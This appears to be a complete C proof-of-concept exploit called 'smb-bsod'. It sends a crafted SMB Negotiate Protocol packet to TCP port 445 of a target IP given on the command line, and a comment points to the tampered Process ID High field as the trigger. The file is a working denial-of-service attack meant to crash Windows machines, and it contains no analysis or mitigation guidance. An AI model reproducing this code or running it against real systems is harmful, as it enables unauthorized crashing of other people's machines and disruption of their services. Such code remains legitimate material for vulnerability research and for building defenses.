#include <sys/types.h>
#include <sys/socket.h>
#ifdef __linux__
/* stupid linux */
#include <linux/sockios.h>
#else
#include <sys/sockio.h>
#endif
#include <netinet/in.h>
#include <net/if.h>

#include <stdio.h>
#include <errno.h>
#ifdef __FreeBSD__
#include <err.h>
#else
#define err(x, y) \
	{			\
		perror(y);	\
		exit(x);	\
	}
#endif
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int
main (int argc, char * argv[])
{
	struct sockaddr_in	sin;
	int			sock;
	char buf[] =
"\x00\x00\x00\x90" /* Begin SMB header: Session message */
"\xff\x53\x4d\x42" /* Server Component: SMB */
"\x72\x00\x00\x00" /* Negociate Protocol */
"\x00\x18\x53\xc8" /* Operation 0x18 & sub 0xc853 */
"\x00\x26" /* Process ID High: --> :) normal value should be "\x00\x00" */
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00";

	if (argc < 2) {
		fprintf(stderr, "usage: smb-bsod [IP address]\n");
		exit (1);
	}

	sock = socket (AF_INET, SOCK_STREAM, 0);
	if (sock == -1)
		err (1, "socket creation failed");

	bzero ((char *)&sin, sizeof(sin));

 	sin.sin_addr.s_addr = inet_addr(argv[1]);
	sin.sin_port = htons(445);
	sin.sin_family = AF_INET;

	printf ("Connecting...\n");

	if (connect (sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
		err (1, "connection failed");

	printf ("Sending...\n");

	if (write (sock, buf, sizeof(buf)) == -1)
		err (1, "send failed");

	close (sock);

	printf ("SMB payload sent\n");

	exit (0);
}